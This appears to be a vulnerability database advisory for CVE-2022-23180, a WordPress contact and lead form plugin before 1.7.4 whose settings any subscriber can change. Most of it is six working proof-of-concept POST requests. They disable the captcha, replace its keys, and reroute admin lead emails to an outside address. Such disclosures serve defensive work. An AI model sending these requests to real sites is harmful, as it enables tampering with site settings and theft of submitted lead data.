Lucene search
Yoru OniWPEX-ID:DA87358A-3A72-4CF7-A2AF-A266DD9B4290HistoryFeb 01, 2022 - 12:00 a.m.
Contact Form & Lead Form Elementor Builder Plugin < 1.7.4 - Multiple Subscriber+ Settings Update
2022-02-0100:00:00
Yoru Oni
74
wordpress
elementor
plugin
security
vulnerability
contact form
lead form
post request
captcha
site key
secret key
lead receiving method
user email notifications
admin email notifications
remember form
EPSS
0
Percentile
14.0%
The plugin doesn’t have authorisation and nonce checks, which could allow any authenticated users, such as subscriber to update and change various settings
PoC POST Request (ON/OFF Captcha):
POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
captcha-on-off-setting=ON&captcha_on_off_form_id=2&action=SaveCaptchaOption
PoC POST Request (Captcha Settings: Site Key & Secret Key):
POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
captcha-setting-sitekey=YoruOni&captcha-setting-secret=YoruOni&captcha-keys=1&action=SaveCaptchaSettings
PoC POST Request (Lead Receiving Method):
POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
data-recieve-method=3&action-lead-setting=1&action=SaveLeadSettings
PoC POST Request (User Email Notifications):
POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
user_email_setting%5Bfrom%5D=yoruoni%40pm.me&user_email_setting%5Bheader%5D=New+Lead+Received&user_email_setting%5Bsubject%5D=Received+a+lead&user_email_setting%5Bmessage%5D=Form+Submitted+Successfully&user-email-setting-option=OFF&user_email_setting%5Bform-id%5D=1&action=SaveUserEmailSettings
PoC POST Request (Admin Email Notifications):
POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
email_setting%5Bto%5D=yoruoni%40pm.me&email_setting%5Bmultiple%5D=&email_setting%5Bfrom%5D=admin%40x14.tv&email_setting%5Bheader%5D=New+Lead+Received&email_setting%5Bsubject%5D=Form+Leads&email_setting%5Bmessage%5D=%5Blf-new-form-data%5D&email_setting%5Bform-id%5D=1&action=SaveEmailSettings
PoC POST Request (Remember this Form):
POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
form_id=1&action=RememberMeThisFormRelated
cve
cve
CVE-2022-23180
2024-01-16 16:15:09
nvd
nvd
CVE-2022-23180
2024-01-16 16:15:09
patchstack
patchstack
cvelist
cvelist
prion
prion
Command injection
2024-01-16 16:15:00
wpvulndb
wpvulndb